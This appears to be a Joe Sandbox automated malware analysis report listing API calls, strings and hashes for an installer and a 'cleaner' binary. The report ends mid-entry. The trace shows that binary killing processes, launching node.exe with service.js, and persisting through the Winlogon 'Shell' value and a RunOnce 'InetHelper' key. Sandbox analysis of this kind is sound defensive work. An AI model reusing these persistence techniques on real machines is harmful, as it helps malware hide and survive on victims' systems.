                                                                                                                                                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                              • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00402E45
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                                                                                                                              • Opcode ID: 55259a99b3f005bd62bd1eee31106c216fd46ae3fbea56f5e47295bb88c76c71
                                                                                                                                                                                                              • Instruction ID: e56410310a72084f4d909e549713b6ef5e7faa8c618e51606751afd800fe69ca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55259a99b3f005bd62bd1eee31106c216fd46ae3fbea56f5e47295bb88c76c71
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28F0317064020CABDF206F60DD4EBEE3B69EB40319F00803AFA45B51D0DBF999598F99
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                                                                                              • Opcode ID: 4dd5869cf8e01605dbba6f89003ab72911ed6556746709080781428bb81ff186
                                                                                                                                                                                                              • Instruction ID: cde632e975db2237da1c3b35629bcc1af8e7f74e244a4afe6fc019873d9bc44b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4dd5869cf8e01605dbba6f89003ab72911ed6556746709080781428bb81ff186
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921BFB1C00124BBCF116FA5DE48D9E7E79EF09324F10023AF9647A2E1CB794D418B98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00446728,00446728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00404CB6
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00446728), ref: 00404CC9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                              • String ID: %u.%u%s%s$(gD
                                                                                                                                                                                                              • API String ID: 3540041739-492854681
                                                                                                                                                                                                              • Opcode ID: 3064c8308b7509d1383c21e902e6820dcf1316d1410b3bc833d73e44a854a58c
                                                                                                                                                                                                              • Instruction ID: aaf23b967d3fcc40b536a7be4f54997d0d4b2484921d6e850771612597014f60
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3064c8308b7509d1383c21e902e6820dcf1316d1410b3bc833d73e44a854a58c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D11EB73A0412837EB00556DAC45EDF3288EB85374F264237FA66F31D1E979CC5282E8
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                                                                                                              • CharNextW.USER32(?,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                                                                                                              • CharPrevW.USER32(?,?,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                                                              • String ID: *?|<>/":
                                                                                                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(0041E5D8), ref: 00401E3E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3808545654-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$Enum
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 464197530-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405976
                                                                                                                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405995
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3449924974-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                                                                                                                • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00004000,00000002,0043E708,00000000,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,?,0040652A,80000002), ref: 004062FC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00000000,0043E708), ref: 00406307
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 004062BD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
                                                                                                                                                                                                              • API String ID: 3356406503-3773729851
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              • Function_0057107D -> Function_00571000

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00571097
                                                                                                                                                                                                              • _wsplitpath.MSVCRT ref: 005710B4
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 005710BD
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 005710C9
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 005710FC
                                                                                                                                                                                                              • memset.MSVCRT ref: 00571113
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0057112C
                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00571153
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000411,00000000,?), ref: 00571168
                                                                                                                                                                                                              • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104), ref: 00571188
                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0057119A
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000009), ref: 005711A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 005711AC
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 005711B7
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 005711C2
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000002,00000000,00000000,00000002,00000080,00000000), ref: 005711F5
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 005711FE
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0057120F
                                                                                                                                                                                                              • MoveFileExW.KERNELBASE(00000000,00000000,00000001), ref: 00571259
                                                                                                                                                                                                              • memset.MSVCRT ref: 0057126B
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000002,00000003,00000000,00000002,00000080,00000000), ref: 00571295
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 005712AD
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 005712B1
                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000), ref: 005712BA
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 005712C7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 005712CB
                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000), ref: 005712CE
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 005712D7
                                                                                                                                                                                                              • free.MSVCRT(?), ref: 005712E3
                                                                                                                                                                                                                • Part of subcall function 00571000: wcslen.MSVCRT ref: 0057101C
                                                                                                                                                                                                                • Part of subcall function 00571000: calloc.MSVCRT ref: 00571030
                                                                                                                                                                                                                • Part of subcall function 00571000: wcslen.MSVCRT ref: 0057104B
                                                                                                                                                                                                                • Part of subcall function 00571000: memcpy.MSVCRT ref: 00571061
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 005712E6
                                                                                                                                                                                                              • memset.MSVCRT ref: 00571327
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000008,00000000,?,?,?), ref: 0057134A
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00571351
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00571358
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0057135E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00571364
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0057136A
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 005713A1
                                                                                                                                                                                                              • wcslen.MSVCRT ref: 005713AE
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,Shell,00000000,00000001,00000000,00000000), ref: 005713CC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 005713D8
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 005713DB
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00571417
                                                                                                                                                                                                              • wcslen.MSVCRT ref: 0057141E
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,InetHelper,00000000,00000001,00000000,00000000), ref: 00571437
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0057143D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2227752204.0000000000571000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00570000, based on PE: true
• Associated: 00000016.00000002.2227710222.0000000000570000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.2227794629.0000000000572000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_570000_cleaner.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$HandleProcess$Create$free$CurrentFilewcslen$memset$ChangeDuplicateFindNameNotificationProcess32Value_wcsicmp$CommandFirstFullImageLineModuleMoveNextOpenQuerySnapshotTerminateToolhelp32_wsplitpathcallocmemcpywcsstr
                                                                                                                                                                                                              • String ID: <!W$<!W$InetHelper$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$Shell$St0P$\\?\pipe\$explorer.exe,"$node.exe$node.exe" "$service.js"$service.js.lock$servicelog.prev.txt$servicelog.txt
                                                                                                                                                                                                              • API String ID: 2280789697-3573369630
                                                                                                                                                                                                              • Opcode ID: 74d31b5b39dea6700bce59dd87f112c2d7d84eb7b57f1749430ad0d9f5381f36
                                                                                                                                                                                                              • Instruction ID: 48bd99c49bc6a8596586b003faf8aaee385635e39c8aaa9f903f00f29934e804
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74d31b5b39dea6700bce59dd87f112c2d7d84eb7b57f1749430ad0d9f5381f36
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AA16FB2144344BFE720AB61EC8DFAB7BACFB94740F004419F749D2091EA719948EB76
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

Control-flow Graph

Basic blocks:
• 26: 571000-57100f
• 27: 571011-571015
• 28: 57102a-57103c (calloc)
• 29: 571017-571028 (wcslen)
• 30: 571075-57107c
• 31: 57103e
• 32: 571042-571073 (wcslen, memcpy)
Edges: 26->27, 26->28, 27->29, 28->30, 28->31, 29->28, 29->29, 31->32, 32->30, 32->32
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2227752204.0000000000571000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00570000, based on PE: true
• Associated: 00000016.00000002.2227710222.0000000000570000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.2227794629.0000000000572000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_570000_cleaner.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcslen$callocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1707914859-0
                                                                                                                                                                                                              • Opcode ID: b6ef4f21f7f996f1868b8aef62475bd8e54672a38639483deca43d463472180e
                                                                                                                                                                                                              • Instruction ID: d5bfe355ba9447d5535f5401b8f3aec03df4959e5f7e7b9cccd763f28de3039c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6ef4f21f7f996f1868b8aef62475bd8e54672a38639483deca43d463472180e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1701A1765043059FDB10CF58FC4C856BBA4EF95364F00441DE94983261EA21E848EAA1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

Callgraph

• Function_00FE107D -> Function_00FE1000 (caller -> callee)

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00FE1097
                                                                                                                                                                                                              • _wsplitpath.MSVCRT ref: 00FE10B4
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 00FE10BD
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00FE10C9
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00FE10FC
                                                                                                                                                                                                              • memset.MSVCRT ref: 00FE1113
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00FE112C
                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00FE1153
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000411,00000000,?), ref: 00FE1168
                                                                                                                                                                                                              • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104), ref: 00FE1188
                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00FE119A
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000009), ref: 00FE11A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FE11AC
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00FE11B7
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FE11C2
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000002,00000000,00000000,00000002,00000080,00000000), ref: 00FE11F5
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00FE11FE
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00FE120F
                                                                                                                                                                                                              • MoveFileExW.KERNELBASE(00000000,00000000,00000001), ref: 00FE1259
                                                                                                                                                                                                              • memset.MSVCRT ref: 00FE126B
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000002,00000003,00000000,00000002,00000080,00000000), ref: 00FE1295
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 00FE12AD
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 00FE12B1
                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000), ref: 00FE12BA
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 00FE12C7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 00FE12CB
                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000), ref: 00FE12CE
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00FE12D7
                                                                                                                                                                                                              • free.MSVCRT(?), ref: 00FE12E3
                                                                                                                                                                                                                • Part of subcall function 00FE1000: wcslen.MSVCRT ref: 00FE101C
                                                                                                                                                                                                                • Part of subcall function 00FE1000: calloc.MSVCRT ref: 00FE1030
                                                                                                                                                                                                                • Part of subcall function 00FE1000: wcslen.MSVCRT ref: 00FE104B
                                                                                                                                                                                                                • Part of subcall function 00FE1000: memcpy.MSVCRT ref: 00FE1061
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00FE12E6
                                                                                                                                                                                                              • memset.MSVCRT ref: 00FE1327
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000008,00000000,?,?,?), ref: 00FE134A
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00FE1351
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00FE1358
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00FE135E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00FE1364
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00FE136A
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00FE13A1
                                                                                                                                                                                                              • wcslen.MSVCRT ref: 00FE13AE
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,Shell,00000000,00000001,00000000,00000000), ref: 00FE13CC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00FE13D8
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00FE13DB
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00FE1417
                                                                                                                                                                                                              • wcslen.MSVCRT ref: 00FE141E
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,InetHelper,00000000,00000001,00000000,00000000), ref: 00FE1437
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00FE143D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001D.00000002.2280747843.0000000000FE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000001D.00000002.2280711919.0000000000FE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                              • Associated: 0000001D.00000002.2280779803.0000000000FE2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_fe0000_cleaner.jbxd
                                                                                                                                                                                                              Similarity
